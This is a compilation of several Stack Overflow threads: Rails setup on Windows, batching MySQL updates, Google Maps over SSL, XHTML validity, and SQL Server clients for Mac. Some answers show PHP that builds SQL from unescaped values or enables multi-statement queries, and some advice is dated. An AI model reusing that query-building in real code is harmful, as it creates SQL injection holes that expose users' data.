If a full stack, I would recommend Subversion, MySql, and Mongrel. These three are all very simple and well-supported in Windows.
A: Seconded for e-texteditor. I use it daily and it's great (although not without its share of BUGS).
For the rails side of things though, I'd actually suggest a virtual machine running linux.
Ubuntu works well, the only caveat is that you have to install rubygems manually, as it does not adhere to the great debian filesystem naming ideology :-(
I suggest this because if you want to do "advanced" things, such as installing ImageMagick/RMagick, or memcached, or a number of other plugins which require native C libraries, it becomes very painful very quickly if you're on windows.
A second reason is that unless you are very atypical, your production server will likely be running linux too. It's good practice to have your development environment match your deployment environment as closely as possible, to help you find and fix bugs earlier and more easily, and avoid fixing bugs that won't affect your production site (like windows specific ones)
Microsoft Virtual PC and VMWare both have free options, which work well, and are plenty fast, so this is not a problem.
A: I don't know about "best", because that's a subjective question, but I can tell you what setup I use and recommend:
Editor: E Text Editor
TextMate seems to be the editor of choice for Rails on Mac. E Text Editor is essentially TextMate for Windows. Its bundles are broadly compatible with TextMate's including the Rails 2 bundle which is included with the basic install.
Alternatively, if you're into the whole Visual Studio ecosystem, then Ruby in Steel PE might be a better bet. It's a really nice all-in-one package that actually comes with (a stripped-down version of) Visual Studio now.
Environment: VirtualBox running Ubuntu Server
Deploying a Rails app can be a pain at the best of times; deploying a Rails app from a Windows environment onto a *nix server is even worse. Plus, running Rails apps on Windows is slow. Running your tests is slow. So I use VirtualBox to host a VM on my Windows machine that mirrors my target deployment environment as closely as possible. In my case I run Ubuntu Server because there are a really nice set of step-by-step tutorials for getting up-and-running with a full Ubuntu-based Rails stack on the SliceHost wiki.
Here are the benefits of developing using a VM:
*
*I map a network drive to the VM so that I can edit the code on it directly from Windows using E Text Editor. The VM acts and feels just like a command line window. So you don't feel like you're in a completely alien environment.
*It runs Rails and other Ruby scripts (like tests) faster than running it natively in Windows
*Everything is contained and snapshottable, so I can experiment and generally play around without worrying about breaking anything. If something does break, I just roll back to a previous good state.
*It uses hardly any RAM. It will typically use less that 100MB (it's currently using ~43MB, but I don't have a Rails app spun-up). Contrast this with, say, Firefox which will typically be hogging >200MB and you realize that running a Linux-based VM like this is amazingly efficient.
*I can move my environment between machines
*I have much more robust deployment workflow
*I can limit the VM to have exactly the same amount of RAM as the server I'll be hosting on. E.g., if I'm to be using a SliceHost 256MB slice, I would limit the RAM to 256MB.
*I can build a seperate environment for different hosts. If I wanted to host on Joyent, for example, I could build an Open Solaris VM
*Gems and other binaries won't need recompiling for your target environment
*It's "a good thing"™ to get to grips with the environment your Rails app is likely to be running on. Seeing as most, if not all, commercial Rails hosts run some sort of *nix derivative, you're going to want to be comfortable with the *nix environment.
A: Instant Rails is a good way to get started quick.
I can verify that it works well on Vista.
A: I suggest you install Ruby first.
Then install Rails.
Then download Aptana and install it.
After that you can install RadRails from Aptana's start page.
Please refer to "Aptana Radrails: An Ide for Rails Development" published by Packt publishing when using RadRails.
A: You might want to take a look at this:
http://www.sapphiresteel.com/
There's a free personal edition too
(Updated: Assuming that you already have Visual Studio Full Fat Edition)
A: I am one of the contributors to Rubystack, a free, all-in-one installer for Windows that installs Apache, MySQL, Ruby, Rails and all the other third-party libraries typically used in a development environment (such as ImageMagick). You may want to give it a try
A: RubyMine 3-4 + (RubyInstaller, DevKit for building gems, Postgres, msys git)
works perfect for me on Windows 7 as a development platform.
Well, except the problem that ruby is very SLOW with rails on windows.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3408",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "17"
} |
Q: Multiple Updates in MySQL I know that you can insert multiple rows at once, is there a way to update multiple rows at once (as in, in one query) in MySQL?
Edit:
For example I have the following
Name id Col1 Col2
Row1 1 6 1
Row2 2 2 3
Row3 3 9 5
Row4 4 16 8
I want to combine all the following Updates into one query
UPDATE table SET Col1 = 1 WHERE id = 1;
UPDATE table SET Col1 = 2 WHERE id = 2;
UPDATE table SET Col2 = 3 WHERE id = 3;
UPDATE table SET Col1 = 10 WHERE id = 4;
UPDATE table SET Col2 = 12 WHERE id = 4;
A: The question is old, yet I'd like to extend the topic with another answer.
My point is, the easiest way to achieve it is just to wrap multiple queries with a transaction. The accepted answer INSERT ... ON DUPLICATE KEY UPDATE is a nice hack, but one should be aware of its drawbacks and limitations:
*
*As has been said, if you happen to launch the query with rows whose primary keys don't exist in the table, the query inserts new "half-baked" records. Probably it's not what you want
*If you have a table with a not-null field without a default value and don't want to touch this field in the query, you'll get a "Field 'fieldname' doesn't have a default value" MySQL warning even if you don't insert a single row at all. It will get you into trouble if you decide to be strict and turn MySQL warnings into runtime exceptions in your app.
I made some performance tests for three of the suggested variants, including the INSERT ... ON DUPLICATE KEY UPDATE variant, a variant with a "case / when / then" clause and a naive approach with a transaction. You may get the python code and results here. The overall conclusion is that the variant with the case statement turns out to be twice as fast as the two other variants, but it's quite hard to write correct and injection-safe code for it, so I personally stick to the simplest approach: using transactions.
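A minimal sketch of that simplest approach, batching the example updates from the question in one transaction:
START TRANSACTION;
UPDATE `table` SET Col1 = 1 WHERE id = 1;
UPDATE `table` SET Col1 = 2 WHERE id = 2;
UPDATE `table` SET Col2 = 3 WHERE id = 3;
UPDATE `table` SET Col1 = 10, Col2 = 12 WHERE id = 4;
COMMIT;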
Edit: Findings of Dakusan prove that my performance estimations are not quite valid. Please see this answer for another, more elaborate research.
A: Not sure why another useful option is not yet mentioned:
UPDATE my_table m
JOIN (
SELECT 1 as id, 10 as _col1, 20 as _col2
UNION ALL
SELECT 2, 5, 10
UNION ALL
SELECT 3, 15, 30
) vals ON m.id = vals.id
SET col1 = _col1, col2 = _col2;
A: Yes, that's possible - you can use INSERT ... ON DUPLICATE KEY UPDATE.
Using your example:
INSERT INTO table (id,Col1,Col2) VALUES (1,1,1),(2,2,3),(3,9,3),(4,10,12)
ON DUPLICATE KEY UPDATE Col1=VALUES(Col1),Col2=VALUES(Col2);
A: Why does no one mention multiple statements in one query?
In PHP, you use the multi_query method of the mysqli instance.
From the php manual
MySQL optionally allows having multiple statements in one statement string. Sending multiple statements at once reduces client-server round trips but requires special handling.
Here is the result compared to the other 3 methods when updating 30,000 rows. The code can be found here, and is based on the answer from @Dakusan
Transaction: 5.5194580554962
Insert: 0.20669293403625
Case: 16.474853992462
Multi: 0.0412278175354
As you can see, multiple statements query is more efficient than the highest answer.
If you get an error message like this:
PHP Warning: Error while sending SET_OPTION packet
You may need to increase the max_allowed_packet in mysql config file which in my machine is /etc/mysql/my.cnf and then restart mysqld.
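For example, a hypothetical my.cnf adjustment (pick a size that fits your batches):
[mysqld]
max_allowed_packet = 64M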
A: All of the following applies to InnoDB.
I feel knowing the speeds of the 3 different methods is important.
There are 3 methods:
*
*INSERT: INSERT with ON DUPLICATE KEY UPDATE
*TRANSACTION: Where you do an update for each record within a transaction
*CASE: In which you a case/when for each different record within an UPDATE
I just tested this, and the INSERT method was 6.7x faster for me than the TRANSACTION method. I tried on a set of both 3,000 and 30,000 rows.
The TRANSACTION method still has to run each individually query, which takes time, though it batches the results in memory, or something, while executing. The TRANSACTION method is also pretty expensive in both replication and query logs.
Even worse, the CASE method was 41.1x slower than the INSERT method w/ 30,000 records (6.1x slower than TRANSACTION). And 75x slower in MyISAM. INSERT and CASE methods broke even at ~1,000 records. Even at 100 records, the CASE method is BARELY faster.
So in general, I feel the INSERT method is both best and easiest to use. The queries are smaller and easier to read and only take up 1 query of action. This applies to both InnoDB and MyISAM.
Bonus stuff:
The solution for the INSERT non-default-field problem is to temporarily turn off the relevant SQL modes: SET SESSION sql_mode=REPLACE(REPLACE(@@SESSION.sql_mode,"STRICT_TRANS_TABLES",""),"STRICT_ALL_TABLES",""). Make sure to save the sql_mode first if you plan on reverting it.
As for other comments I've seen that say the auto_increment goes up using the INSERT method, this does seem to be the case in InnoDB, but not MyISAM.
Code to run the tests is as follows. It also outputs .SQL files to remove php interpreter overhead
<?php
//Variables
$NumRows=30000;
//These 2 functions need to be filled in
function InitSQL()
{
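//One possible implementation (an assumption, for illustration): $GLOBALS['DB']=new mysqli('localhost', 'user', 'pass', 'test');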
}
function RunSQLQuery($Q)
{
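//One possible implementation (an assumption, for illustration): $GLOBALS['DB']->query($Q) or die($GLOBALS['DB']->error);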
}
//Run the 3 tests
InitSQL();
for($i=0;$i<3;$i++)
RunTest($i, $NumRows);
function RunTest($TestNum, $NumRows)
{
$TheQueries=Array();
$DoQuery=function($Query) use (&$TheQueries)
{
RunSQLQuery($Query);
$TheQueries[]=$Query;
};
$TableName='Test';
$DoQuery('DROP TABLE IF EXISTS '.$TableName);
$DoQuery('CREATE TABLE '.$TableName.' (i1 int NOT NULL AUTO_INCREMENT, i2 int NOT NULL, primary key (i1)) ENGINE=InnoDB');
$DoQuery('INSERT INTO '.$TableName.' (i2) VALUES ('.implode('), (', range(2, $NumRows+1)).')');
if($TestNum==0)
{
$TestName='Transaction';
$Start=microtime(true);
$DoQuery('START TRANSACTION');
for($i=1;$i<=$NumRows;$i++)
$DoQuery('UPDATE '.$TableName.' SET i2='.(($i+5)*1000).' WHERE i1='.$i);
$DoQuery('COMMIT');
}
if($TestNum==1)
{
$TestName='Insert';
$Query=Array();
for($i=1;$i<=$NumRows;$i++)
$Query[]=sprintf("(%d,%d)", $i, (($i+5)*1000));
$Start=microtime(true);
$DoQuery('INSERT INTO '.$TableName.' VALUES '.implode(', ', $Query).' ON DUPLICATE KEY UPDATE i2=VALUES(i2)');
}
if($TestNum==2)
{
$TestName='Case';
$Query=Array();
for($i=1;$i<=$NumRows;$i++)
$Query[]=sprintf('WHEN %d THEN %d', $i, (($i+5)*1000));
$Start=microtime(true);
$DoQuery("UPDATE $TableName SET i2=CASE i1\n".implode("\n", $Query)."\nEND\nWHERE i1 IN (".implode(',', range(1, $NumRows)).')');
}
print "$TestName: ".(microtime(true)-$Start)."<br>\n";
file_put_contents("./$TestName.sql", implode(";\n", $TheQueries).';');
}
A: There is a setting you can alter called 'multi statement' that disables MySQL's 'safety mechanism', implemented to prevent the injection of (more than one) command. Typical of MySQL's 'brilliant' implementation, it also prevents users from doing efficient queries.
Here (http://dev.mysql.com/doc/refman/5.1/en/mysql-set-server-option.html) is some info on the C implementation of the setting.
If you're using PHP, you can use mysqli to do multi statements (I think PHP has shipped with mysqli for a while now)
$con = new mysqli('localhost','user1','password','my_database');
$query = "Update MyTable SET col1='some value' WHERE id=1 LIMIT 1;";
$query .= "UPDATE MyTable SET col1='other value' WHERE id=2 LIMIT 1;";
//etc
$con->multi_query($query);
$con->close();
Hope that helps.
A: You can alias the same table to give you the ids you want to update by (if you are doing a row-by-row update):
UPDATE table1 tab1, table1 tab2 -- alias references the same table
SET
col1 = 1
,col2 = 2
. . .
WHERE
tab1.id = tab2.id;
Additionally, it should seem obvious that you can also update from other tables as well. In this case, the update doubles as a "SELECT" statement, giving you the data from the table you are specifying. You are explicitly stating the update values in your query, so the second table is unaffected.
A: You may also be interested in using joins on updates, which is possible as well.
Update someTable s Inner Join anotherTable a on s.id = a.id
Set s.someValue = 4
Where a.id = 4
-- Only updates someValue in someTable rows that have a matching row in anotherTable with id 4.
Edit: If the values you are updating aren't coming from somewhere else in the database, you'll need to issue multiple update queries.
A: No-one has yet mentioned what for me would be a much easier way to do this - Use a SQL editor that allows you to execute multiple individual queries. This screenshot is from Sequel Ace, I'd assume that Sequel Pro and probably other editors have similar functionality. (This of course assumes you only need to run this as a one-off thing rather than as an integrated part of your app/site).
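For example, a sketch reusing the table and columns from the question (the editor simply runs each statement in turn):
UPDATE table SET Col1 = 1 WHERE id = 1;
UPDATE table SET Col1 = 2 WHERE id = 2;
UPDATE table SET Col2 = 3 WHERE id = 3;
UPDATE table SET Col1 = 10, Col2 = 12 WHERE id = 4;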
A: Since you have dynamic values, you need to use an IF or CASE for the columns to be updated. It gets kinda ugly, but it should work.
Using your example, you could do it like:
UPDATE table SET Col1 = CASE id
WHEN 1 THEN 1
WHEN 2 THEN 2
WHEN 4 THEN 10
ELSE Col1
END,
Col2 = CASE id
WHEN 3 THEN 3
WHEN 4 THEN 12
ELSE Col2
END
WHERE id IN (1, 2, 3, 4);
A: UPDATE table1, table2 SET table1.col1='value', table2.col1='value' WHERE table1.col3='567' AND table2.col6='567'
This should work for ya.
There is a reference in the MySQL manual for multiple tables.
A: Use a temporary table
// Reorder items
function update_items_tempdb(&$items)
{
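// query() is assumed here to be an application-level helper that executes the given SQL.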
shuffle($items);
$table_name = uniqid('tmp_test_');
$sql = "CREATE TEMPORARY TABLE `$table_name` ("
." `id` int(10) unsigned NOT NULL AUTO_INCREMENT"
.", `position` int(10) unsigned NOT NULL"
.", PRIMARY KEY (`id`)"
.") ENGINE = MEMORY";
query($sql);
$i = 0;
$sql = '';
foreach ($items as &$item)
{
$item->position = $i++;
$sql .= ($sql ? ', ' : '')."({$item->id}, {$item->position})";
}
if ($sql)
{
query("INSERT INTO `$table_name` (id, position) VALUES $sql");
$sql = "UPDATE `test`, `$table_name` SET `test`.position = `$table_name`.position"
." WHERE `$table_name`.id = `test`.id";
query($sql);
}
query("DROP TABLE `$table_name`");
}
A: And now the easy way
update my_table m, -- let create a temp table with populated values
(select 1 as id, 20 as value union -- this part will be generated
select 2 as id, 30 as value union -- using a backend code
-- for loop
select N as id, X as value
) t
set m.value = t.value where t.id=m.id -- now update by join - quick
A: Yes, it is possible using the INSERT ... ON DUPLICATE KEY UPDATE SQL statement.
syntax:
INSERT INTO table_name (a,b,c) VALUES (1,2,3),(4,5,6)
ON DUPLICATE KEY UPDATE a=VALUES(a),b=VALUES(b),c=VALUES(c)
A: use
REPLACE INTO `table` (`id`,`col1`,`col2`) VALUES
(1,6,1),(2,2,3),(3,9,5),(4,16,8);
Please note:
*
*id has to be a primary or unique key
*if you use foreign keys to reference the table, REPLACE deletes then inserts, so this might cause an error
A: I took the answer from @newtover and extended it using the new json_table function in MySql 8. This allows you to create a stored procedure to handle the workload rather than building your own SQL text in code:
drop table if exists `test`;
create table `test` (
`Id` int,
`Number` int,
PRIMARY KEY (`Id`)
);
insert into test (Id, Number) values (1, 1), (2, 2);
DROP procedure IF EXISTS `Test`;
DELIMITER $$
CREATE PROCEDURE `Test`(
p_json json
)
BEGIN
update test s
join json_table(p_json, '$[*]' columns(`id` int path '$.id', `number` int path '$.number')) v
on s.Id=v.id set s.Number=v.number;
END$$
DELIMITER ;
call `Test`('[{"id": 1, "number": 10}, {"id": 2, "number": 20}]');
select * from test;
drop table if exists `test`;
It's a few ms slower than pure SQL but I'm happy to take the hit rather than generate the sql text in code. Not sure how performant it is with huge recordsets (the JSON object has a max size of 1Gb) but I use it all the time when updating 10k rows at a time.
A: UPDATE `your_table` SET
`something` = IF(`id`="1","new_value1",`something`), `smth2` = IF(`id`="1", "nv1",`smth2`),
`something` = IF(`id`="2","new_value2",`something`), `smth2` = IF(`id`="2", "nv2",`smth2`),
`something` = IF(`id`="4","new_value3",`something`), `smth2` = IF(`id`="4", "nv3",`smth2`),
`something` = IF(`id`="6","new_value4",`something`), `smth2` = IF(`id`="6", "nv4",`smth2`),
`something` = IF(`id`="3","new_value5",`something`), `smth2` = IF(`id`="3", "nv5",`smth2`),
`something` = IF(`id`="5","new_value6",`something`), `smth2` = IF(`id`="5", "nv6",`smth2`)
// You just build it in PHP like this:
$q = 'UPDATE `your_table` SET ';
foreach($data as $dat){
$q .= '
`something` = IF(`id`="'.$dat->id.'","'.$dat->value.'",`something`),
`smth2` = IF(`id`="'.$dat->id.'", "'.$dat->value2.'",`smth2`),';
}
$q = substr($q,0,-1);
So you can update the whole table with one query
A: UPDATE tableName SET col1='000' WHERE id='3' OR id='5'
This should achieve what you're looking for. Just add more ids. I have tested it.
A: The following will update all rows in one table
Update Table Set
Column1 = 'New Value'
The next one will update all rows where the value of Column2 is more than 5
Update Table Set
Column1 = 'New Value'
Where
Column2 > 5
There is also Unkwntech's example of updating more than one table:
UPDATE table1, table2 SET
table1.col1 = 'value',
table2.col1 = 'value'
WHERE
table1.col3 = '567'
AND table2.col6='567'
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3432",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "444"
} |
Q: Options for Google Maps over SSL We recently discovered that the Google Maps API does not play nicely with SSL. Fair enough, but what are some options for overcoming this that others have used effectively?
Will the Maps API work over SSL (HTTPS)?
At this time, the Maps API is not
available over a secure (SSL)
connection. If you are running the
Maps API on a secure site, the browser
may warn the user about non-secure
objects on the screen.
We have considered the following options
*
*Splitting the page so that credit card collection (the requirement for SSL) is not on the same page as the Google Map.
*Switching to another map provider, such as Virtual Earth. Rumor has it that they support SSL.
*Playing tricks with IFRAMEs. Sounds kludgy.
*Proxying the calls to Google. Sounds like a lot of overhead.
Are there other options, or does anyone have insight into the options that we have considered?
A: Just to add to this
http://googlegeodevelopers.blogspot.com/2011/03/maps-apis-over-ssl-now-available-to-all.html
Haven't tried migrating my SSL maps (ended up using Bing maps api) back to Google yet but might well be on the cards.
A: This seems like a business requirements/usability issue - do you have a good reason for putting the map on the credit card page? If so, maybe it's worth working through some technical problems.
You might try using Mapstraction, so you can switch to a provider that supports SSL, and switch back to Google if they support it in the future.
A: I would go with your first solution. This allows the user to focus on entering their credit card details.
You can then transfer them to another webpage which asks or provides them further information relating to the Google Map.
A: If you are a Google Maps API Premier customer, then SSL is supported. We use this and it works well.
Prior to Google making SSL available, we proxied all the traffic and this worked acceptably. You lose the advantage of Google's CDN when you use this approach and you may get your IP banned since it will appear that you are generating a lot of traffic.
A: I'd agree with the previous two answers that in this instance it may be better from a usability perspective to split the two functions into separate screens. You really want your users to be focussed on entering complete and accurate credit card information, and having a map on the same screen may be distracting.
For the record though, Virtual Earth certainly does fully support SSL. To enable it you simply need to change the script reference from http:// to https:// and append &s=1 to the URL, e.g.
<script src="http://dev.virtualearth.net/mapcontrol/mapcontrol.ashx?v=6.1" type="text/javascript"></script>
becomes
<script src="https://dev.virtualearth.net/mapcontrol/mapcontrol.ashx?v=6.1&s=1" type="text/javascript"></script>
A: If you are getting SECURITY ALERT on IE 9 while displaying Google maps, use
<script src="https://maps.google.com/maps?file=api&v=2&hl=en&tab=wl&z=6&sensor=true&key=<?php echo $key;?>
" type="text/javascript"></script>
instead of
<script src="https://maps.googleapis.com/maps/api/js?key=YOUR_API_KEY&sensor=SET_TO_TRUE_OR_FALSE"
type="text/javascript"></script>
A: I've just removed the http protocol and it worked!
From this:
<script src="http://maps.google.com/maps/api/js?sensor=true" type="text/javascript"></script>
To this:
<script src="//maps.google.com/maps/api/js?sensor=true" type="text/javascript"></script>
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3437",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "20"
} |
Q: Is it acceptable for invalid XHTML? I've noticed a lot of sites, SO included, use XHTML as their mark-up language and then fail to adhere to the spec. Just browsing the source for SO there are missing closing tags for paragraphs, invalid elements, etc.
So should tools (and developers) use the XHTML doctype if they are going to produce invalid mark up? And should browsers be more firm in their acceptance of poor mark-up?
And before anyone shouts hypocrite, my blog has one piece of invalid mark-up involving the captcha (or it did the last time I checked) which involves styling the noscript tag.
A: We should always try to make it validate according to standards. We'll be sure that the website will display and work fine on current browsers AND future browsers.
A: I don't think that, if you specify a doctype, there is any reason not to adhere to this doctype.
Using XHTML makes automated error detection easy, every change can be automatically checked for invalid markup. This prevents errors, especially when using automatically generated content. It is really easy for a web developer using a templating engine (JSP, ASP.NET StringTemplate, etcetera) to copy/paste one closing tag too little or too many. When this is your only error, it can be detected and fixed immediately. I once worked for a site that had 165 validation errors per page, of which 2 or 3 were actual bugs. These were hard to find in the clutter of other errors. Automatic validation would have prevented these errors at the source.
Needless to say, choosing a standard and sticking to it can only benefit interoperability with other systems (screen scrapers, screen readers, search engines) and I have never come across a situation where a valid semantic XHTML with CSS solution wasn't possible for all major browsers.
Obviously, when working with complex systems, it's not always possible to stick to your doctype, but this is mostly a result of improper communication between the different teams developing different parts of these systems, or, most likely, legacy systems. In the last case it's probably better to isolate these cases and change your doctype accordingly.
It's good to be pragmatic and not adhere to XHTML just because someone said so, regardless of costs, but with current knowledge about CSS and browsers, testing and validation tools, most of the time the benefits are much greater than the costs.
A: You can say that I have an OCD on XHTML validity. I find that most of the problems with the code not being valid come from programmers not knowing the difference between HTML and XHTML. I've been writing 100% valid XHTML and CSS for a while now and have never had any major rendering problems with other browsers. If you keep everything valid, and don't try anything too exotic css wise, you will save yourself a ton of time in fixes.
A: There are many reasons to use valid markup. My favorite is that it allows you to use validation as a form of regression testing, preventing the markup equivalent of "delta rot" from leading to real rendering problems once the errors reach some critical mass. And really, it's just plain sloppy to allow "lazy" errors like typos and mis-nested/unclosed tags to accumulate. Valid markup is one way to identify passionate programmers.
There's also the issue of debugging: valid markup also gives you a stable baseline from which to work on the inevitable cross-browser compatibility woes. No web developer who values his time should begin debugging browser compatibility problems without first ensuring that the markup is at least syntactically valid—and any other invalid markup should have a good reason for being there.
(Incidentally, stackoverflow.com fails both these tests, and suggestions to fix the problems were declined.)
All of that said, to answer your specific question, it's probably not worthwhile to use one of the XHTML doctypes unless you plan to produce valid (or at least well-formed) markup. XHTML's primary advantages are derived from the fact that XHTML is XML, allowing it to be processed and transformed by tools and technologies that work with XML. If you don't plan to make your XHTML well-formed XML, then there's little point in choosing that doctype. The latest HTML 4 spec will probably do everything you need, and it's much more forgiving.
A: I wouldn't use XHTML at all just to save myself the philosophical stress. It's not like any browsers are treating it like XHTML anyway.
Browsers will reject poor mark-up if the page is sent as application/xhtml+xml, but pages rarely are. This is fine.
I would be more concerned about things like inline use of CSS and JavaScript with Stack Overflow, just because they make maintenance harder.
A: Though I believe in striving for valid XHTML and CSS, it's often hard to do for a number of reasons.
*
*First, some of the content could be loaded via AJAX. Sometimes, fragments are not properly inserted into the existing DOM.
*The HTML that you are viewing may not have all been produced in the same document. For example, the page could be made of up components, or templates, and then thrown together right before the browser renders it. This isn't an excuse, but you can't assume that the HTML you're seeing was hand coded all at once.
*What if some of the code generated by Markdown is invalid? You can't blame Stack Overflow for not producing valid code.
*Lastly, the purpose of the DOCTYPE is not to simply say "Hey, I'm using valid code" but it's also to give the browser a heads up what you're trying to do so that it can at least come close to correctly parsing that information.
I don't think that most developers specify a DOCTYPE and then explicitly fail to adhere to it.
A: While I agree with the sentiment of the "if it renders fine then don't worry about it" statement, it's good to follow a standard, even though it may not be fully supported right now. You can still use tables for layout, but they're discouraged for a reason.
A: No, you should not use XHTML if you can't guarantee well-formedness, and in practice you can't guarantee it if you don't use XML serializer to generate markup. Read about producing XML.
Well-formedness is the thing that differentiates XHTML from HTML. XHTML with "just one" markup error ceases to be XHTML. It has to be perfect every time.
If "XHTML" site appears to work with some errors, it's because browsers ignore the DOCTYPE and interpret page as HTML.
See XHTML proxy that forces interpretation of pages as XHTML. Most of the time they fail miserably. This is one of the reason why future of XHTML is uncertain and why development of HTML has been resumed.
A: It depends. I had that issue with my blog where a YouTube video caused invalid XHTML, but it rendered fine. On the other hand, I have a "Valid XHTML" link, and a combination of a "Valid XHTML" claim and invalid XHTML is not professional.
As SO does not claim to be valid, I think it's acceptable, but personally if I were Jeff I would be bothered and try to fix it even if it looks good in modern browsers, but some people would rather just move on and actually get things done instead of fixing non-existent bugs.
A: So long as it works in IE, FF, Safari, (insert other browser here) you should be okay. Validation isn't as important as having it render correctly in multiple browsers. Just because it is valid, doesn't mean it'll work in IE properly, for instance.
Run Google Analytics or similar on your site and see what kind of browsers your users are using and then judge which browsers you need to support the most and worry about the less important ones when you have the spare time to do so.
A: I say, if it renders OK, then it doesn't matter if it's pixel perfect.
It takes a while to get a site up and running the way you want it; going back and making changes will change the way the page renders slightly, and then you have to fix those problems.
Now, I'm not saying you should built sloppy web pages, but I see no reason to fix what ain't broke. Browsers aren't going to drop support for error correction anytime in the near future.
A: I don't understand why everyone gets caught up trying to make their websites fit the standard when some browsers still have problems properly rendering standard code. I've been in web design for something like 10 years and I stopped double coding (read: hacking css), and changing stupid stuff just so I could put a button on my site.
I believe that using a <div> will cause you to be invalid regardless, and it gets a bit harder to do any major JavaScript/AJAX without it.
A: There are so many standards and they are so badly "enforced" or supported that I don't think it matters. Don't get me wrong, I think there should be standards but because they are not enforced, nobody follows them and it's a massive downward spiral.
A: For 99.999% of the sites out there, it really won't matter. The only time I've had it matter, I ran the HTML input through HTMLTidy to XHTML-ize it, and then ran my processing on it.
Pretty much, it's the old programmer's axiom: trust no input.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3448",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "21"
} |
Q: SQL Client for Mac OS X that works with MS SQL Server How can I connect to a remote SQL server using Mac OS X? I don't really need a GUI, but it would be nice to have for the color coding and resultset grid. I'd rather not have to use a VM.
Is there a SQL client for Mac OS X that works with MS SQL Server?
A: When this question was asked there were very few tools out there worth much. I also ended up using Fusion and a Windows client. I have tried just about everything for MAC and Linux and never found anything worthwhile. That included dbvisualizer, squirrel (particularly bad, even though the windows haters in my office swear by it), the oracle SQL developer and a bunch of others.
Nothing compared to DBArtizan on Windows as far as I was concerned and I was prepared to use it with Fusion or VirtualBox. I don't use the MS product because it is only limited to MS SQL.
Bottom line is nothing free is worthwhile, nor were most commercial non windows products
However, now (March 2010) I believe there are two serious contenders, worthwhile versions for the Mac and Linux which have a low cost associated with them. The first one is Aqua Data Studio, which costs about $450 per user - barely acceptable, but cheap compared to DBArtizan and others with similar functionality (but MS only). The other is RazorSQL, which only costs $69 per user.
Aqua Data Studio is good, but a resource hog, basically pretty sluggish, and has non-essential features such as the ER diagram tool, which it is pretty bad at. The Razor is lightning fast, is only a 16 meg download, and has everything an SQL developer needs, including a TSQL editor.
So the big winner is RazorSQL, and for $69, well worth it and feature-packed. Believe me, after several years of waiting to find a cheap non-Windows substitute for DBArtizan, I have finally found one, and I have been very picky.
A: My employer produces a simple, proof-of-concept HTML5-based SQL client which can be used against any ODBC data source on the web-browser host machine, through the HTML5 WebDB-to-ODBC Bridge we also produce. These components are free, for Mac, Windows, and more.
Applicable to many of the other answers here -- the Type 1 JDBC-to-ODBC Bridge that most are referring to is the one Sun built in to and bundled with the JVM. JVM/JRE/JDK documentation has always advised against using this built-in except in experimental scenarios, or when no other option exists, because this component was built as a proof-of-concept, and was never intended for production use.
My employer makes an enterprise-grade JDBC-to-ODBC Bridge, available as either a Single-Tier (installs entirely on the client application host) or a Multi-Tier (splits components over the client application host and the ODBC data source host, enabling JDBC client applications in any JVM to use ODBC data sources on Mac, Windows, Linux, etc.). This solution isn't free.
All of the above can be used with the ODBC Drivers for Sybase & Microsoft SQL Server (or other databases) we also produce ...
A: I thought Sequel Pro for MySQL looked pretty interesting. It's hard to find one tool that works with all those databases (especially SQL Server 2005 . . . most people use SQL Server Management Studio and that's Windows only of course).
A: DbVisualizer supports many different databases. There is a free edition that I have used previously. Download from here
A: Squirrel SQL is a Java-based SQL client that I've had good experience with on Windows and Linux. Since it's Java, it should do the trick.
It's open source. You can run multiple sessions with multiple databases concurrently.
A: I vote for RazorSQL also. It's very powerful in many respects and practically supports most databases out there. I mostly use it for SQL Server, MySQL and PostgreSQL.
A: I have had good success over the last two years or so using Navicat for MySQL.
The UI could use a little updating, but all of the tools and options they provide make the cost justifiable for me.
A: Let's work together on a canonical answer.
Native Apps
*
*SQLPro for MSSQL
*Navicat
*Valentina Studio
*TablePlus
Java-Based
*
*Oracle SQL Developer (free)
*SQuirrel SQL (free, open source)
*Razor SQL
*DB Visualizer
*DBeaver (free, open source)
*SQL Workbench/J (free, open source)
*JetBrains DataGrip
*Metabase (free, open source)
*Netbeans (free, open source, full development environment)
Electron-Based
*
*Visual Studio Code with mssql extension
*Azure Data Studio
*SQLectron
(TODO: Add others mentioned below)
A: This will be the second question in a row I've answered with this, so I think it's worth pointing out that I have no affiliation with this product, but I use it and love it and think it's the right answer to this question too: DbVisualizer.
A: I use AquaFold at work on Windows, but it's based on Java and supports Mac OS X.
A: I use the Navicat clients for MySQL and PostgreSQL and am happy with them. "good" is obviously subjective... how do you judge your DB clients?
A: I like SQLGrinder.
It's built using Cocoa, so it looks a lot better and feels more like a Mac OS X application than all the Java-based applications mentioned here.
It uses JDBC drivers to connect to Microsoft SQL Server 2005, FrontBase, MySQL, OpenBase, Oracle, PostgreSQL, and Sybase.
Free trial or $59.
A: I've used DB Solo and I like it a lot. It's only $99 and comparable to many more expensive tools. It supports Oracle, SQL Server, Sybase, MySQL, PostgreSQL and others.
A: I've been using Oracle SQL Developer since the Microsoft software for SQL Server is not currently available on Mac OS X. It works wonders. I would also recommend RazorSQL or SQLGrinder.
A: When this question was asked, Microsoft's Remote Desktop for OS X had been unsupported for years. It wasn't a Universal Binary, and I found it to be somewhat buggy (I recall that the application will just quit after a failed connection instead of allowing you to alter the connection info and try again).
At the time I recommended the Open Source CoRD, a good RDP client for Mac.
Since then Microsoft Remote Desktop Client for Mac 2 was released.
A: Not sure about open-source, but I've heard good things about http://www.advenio.com/sqlgrinder/ (not tried it, I prefer to write Python scripts to try things out rather than use GUIs;-).
A: The Java-based Oracle SQL Developer has a plugin module that supports SQL Server. I use it regularly on my Mac. It's free, too.
Here's how to install the SQL Server plugin:
*
*Run SQL Developer
*go to this menu item: Oracle SQL Developer/Preferences/Database/Third-party JDBC Drivers
*Click help.
*It will have pointers to the JAR files for MySQL, SQL Server, etc.
*The SQL Server JAR file is available at http://sourceforge.net/projects/jtds/files/
A: This doesn't specifically answer your question, because I'm not sure in any clients exist in Mac OS X, but I generally just Remote Desktop into the server and work through that. Another option is VMware Fusion (which is much better than Parallels in my opinion) + Windows XP + SQL Server Management Studio.
A: I've used Eclipse with the Quantum-DB plugins for that purpose since I was already using Eclipse anyway.
